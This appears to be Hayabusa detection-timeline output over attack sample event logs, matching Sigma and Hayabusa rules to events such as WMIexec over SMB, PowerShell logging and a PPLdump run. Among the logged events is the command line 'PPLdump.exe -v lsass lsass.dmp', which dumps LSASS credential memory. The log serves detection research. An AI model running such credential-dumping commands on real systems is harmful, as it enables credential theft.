0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.140 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.179 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.195 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.211 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.211 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.211 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,high,,Windows Hacktool Imphash,,rules/sigma/process_creation_sysmon/proc_creation_win_hacktool_imphashes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.417 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.418 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.427 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.081 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.081 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.081 +00:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.083 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.084 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.307 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:27.649 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:27.653 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.260 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 10:09:29.667 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.671 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.674 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.677 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.684 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.684 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.757 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.758 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.761 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.762 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.762 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.762 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.763 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.763 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.764 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.768 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.768 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.771 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.771 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.772 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.772 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.772 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; 